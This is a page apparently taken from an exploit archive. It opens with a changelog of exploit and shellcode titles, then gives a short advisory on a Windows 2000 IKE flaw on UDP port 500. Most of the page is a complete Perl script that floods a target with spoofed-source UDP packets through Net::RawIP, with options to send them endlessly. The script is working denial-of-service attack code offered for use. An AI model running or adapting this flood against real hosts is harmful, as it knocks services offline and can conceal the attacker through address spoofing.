
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
76 lines
No EOL
2.5 KiB
Perl
Executable file
76 lines
No EOL
2.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/3652/info
|
||
|
||
Internet Protocol Security (IPSec) provides authentication and encryption for IP network traffic. The Internet Key Exchange (IKE) protocol is a management protocol standard which is used with the IPSec standard. IKE contributes to the IPSec standard by providing additional features and by default listens on UDP port 500.
|
||
|
||
|
||
|
||
An issue exists in IKE which could cause a Windows 2000 host to stop responding.
|
||
|
||
|
||
|
||
Connecting to port 500 and submitting a continuous stream of arbitrary packets, will cause the CPU utilization to spike to approximately 100%.
|
||
|
||
|
||
It should be noted that this vulnerability may be due to an underlying issue with the UDP protocol.
|
||
|
||
#!/usr/bin/perl -w
|
||
###############################################################################
|
||
# Author : Nelson Brito
|
||
# E-mail : nelson@SEKURE.ORG
|
||
# File : nb-isakmp.pl
|
||
# Version : 0.3 Alpha
|
||
###############################################################################
|
||
use Socket;
|
||
use Net::RawIP;
|
||
use Getopt::Std;
|
||
|
||
getopts("s:d:p:l:n:v:t:f:rL",\%o);$ver="0.3a";$0=~s#.*/##;
|
||
|
||
print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant ---\n";
|
||
|
||
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
|
||
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
|
||
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $!\n");
|
||
|
||
($o{'s'}&&$o{'d'})||die
|
||
"\nUse: $0 [IP Options] [UDP Options]\n\n",
|
||
"IP Options:\n",
|
||
"\t\t-s*\tsource address to spoof\n",
|
||
"\t\t-d*\tdestination address to attack\n",
|
||
"\t\t-v\tIP Version\t\t\t\t(def: $v)\n",
|
||
"\t\t-t\tIP Type of Service (TOS)\t\t(def: $t)\n",
|
||
"\t\t-f\tIP fragementation offset\t\t(def: $f)\n",
|
||
"\t\t-T\tIP Time to Live (TTL)\t\t\t(def: $T)\n",
|
||
"UDP Options:\n",
|
||
"\t\t-p\tdestination port to attack\t\t(def: $p)\n",
|
||
"\t\t-l\tpacket length to send\t\t\t(def: $l)\n",
|
||
"\t\t-r\tset randon data\t\t\t\t(def: \".\")\n",
|
||
"Generic:\n",
|
||
"\t\t-n\tnumber of packets to send\t\t(def: $n)\n",
|
||
"\t\t-L\tsend packets forever\n\n",
|
||
"Copyright <20> 2000 Nelson Brito <nelson\@SEKURE.ORG>.\n";
|
||
|
||
while($n > 0){
|
||
$|=1;print".";$sp=int rand 65535;
|
||
$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;
|
||
$nb=new Net::RawIP({
|
||
ip=>
|
||
{
|
||
version=>$v,
|
||
tos=>$t,
|
||
ttl=>$T,
|
||
frag_off=>$f,
|
||
saddr=>$o{'s'},
|
||
daddr=>$o{'d'}
|
||
},
|
||
udp=>
|
||
{
|
||
source=>$sp,
|
||
dest=>$p,
|
||
len=>$l,
|
||
data=>$D
|
||
}
|
||
});
|
||
$nb->send;undef $nb;!$o{'L'}&&$n--;
|
||
}
|
||
print"Finish!\n"; |